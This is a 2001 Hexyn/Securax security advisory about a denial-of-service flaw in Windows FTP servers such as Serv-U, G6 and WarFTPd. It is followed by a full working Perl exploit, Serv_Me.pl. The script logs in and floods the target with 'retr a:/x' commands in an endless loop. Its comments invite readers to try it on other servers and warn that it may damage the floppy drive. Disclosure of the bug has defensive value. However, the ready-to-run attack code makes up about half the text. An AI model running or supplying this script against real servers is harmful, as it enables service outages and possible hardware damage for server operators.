Hexyn / Securax Advisory #19 - Multiple FTP Server DoS

Topic: Multiple FTP Server DoS
Announced: 2001-02-17
Affects: Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...

DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN  BASED  UPON   TRIAL  AND  ERROR  RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS  100%  CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT  PRIOR  NOTICE.

THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL 
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS 
BE CORRECT.

I. Problem Description
**********************
There is a DoS attack in most of  the  FTP  Servers  available  on  for
Windows 9x/NT. The bug is a consequence of the way Windows handles disk
drives.

II. Impact
**************
When sending  the  command  "retr a:/blah"  (or  "get a:/blah"  in  the
default UNIX FTP client), the server will freeze for about one  second,
and the CPU usage will go through the roof.

Exploit:
--------
Available at: http://t-Omicr0n.hexyn.be/exploits.htm

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, 
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, 
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone 
at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be



#!/usr/bin/perl
 
 #
 #   					Serv_Me.pl - Remote FTP DoS'er
 #   					------------------------------
 #   "And in the end I will be free, by kissing you, or killing me."
 #						-- Mister Me.
    
 #   Tested on Serv-U FTP, G6 FTP and WarFTPd. Lots of other servers are vulnerable, just try.
 #   It DoSSeS by flooding the server with "retr a:/bla" commands.
 #   CPU usage during tests (in %): 2 2 3 13 100 100 100 100 ...

# Read "Hexyn / Securax Advisory #19 - Multiple FTP Server DoS" for more information
# @ http://t-Omicr0n.hexyn.be/advisories.htm

 #   I *hate* those flooding DoS'es, it's normal a server slows down when you flood the hell 
 #   out of it, but this flood only sends 0.009 Kb/s and that's not even considered a flood,
 #   that's considered a drop of bytes every second.
 #   You can even DoS the server over a 1 KiloBit/s modem... :-)

# Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F, 
#		Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips, 
#		Lacrima, GigaByte and everyone at #securax@irc.hexyn.be 

 #   WARNING: This *may* damage the server's floppy disk drive.
 
use IO::Socket;       

sub initiate {
	if ($ARGV[0] eq '') {die "Usage: perl serv_me.pl <host> <port> <username> <password>\nExample: perl serv_me.pl 127.0.0.1 21 anonymous me@\n";}

	$host = $ARGV[0];
	$port = $ARGV[1];
	$user = $ARGV[2];
	$pass = $ARGV[3];
};

sub connecttoserver {
	print("Connecting to host: $host\n");
	$socket = IO::Socket::INET->new (   PeerAddr    => $host,
      	                              PeerPort    => $port,
	                                    Proto       => "tcp",
	                                    Type        => SOCK_STREAM
	                                ) || die "Can't connect to $host";       

	print "Socket Connected. Loggin in...\n";
};

sub login {
	print "user $user\n";
	print $socket "user $user\r\n";
	$response = <$socket>;
	print "$response\n";

	print "pass $pass\n";
	print $socket "pass $pass\r\n";
	$response = <$socket>;
	print "$response\n";

	print "Logged in. Dossing now. Press CTRL-C to stop.\n";
};



sub doit {
	for (;;){
		print "retr a:/x\n";
		print $socket "retr a:/x\r\n";
		$response = <$socket>;
		print "$response";
	}
}

initiate();
connecttoserver();
login();
doit();

# -- t-Omicr0n @ http://t-Omicr0n.hexyn.be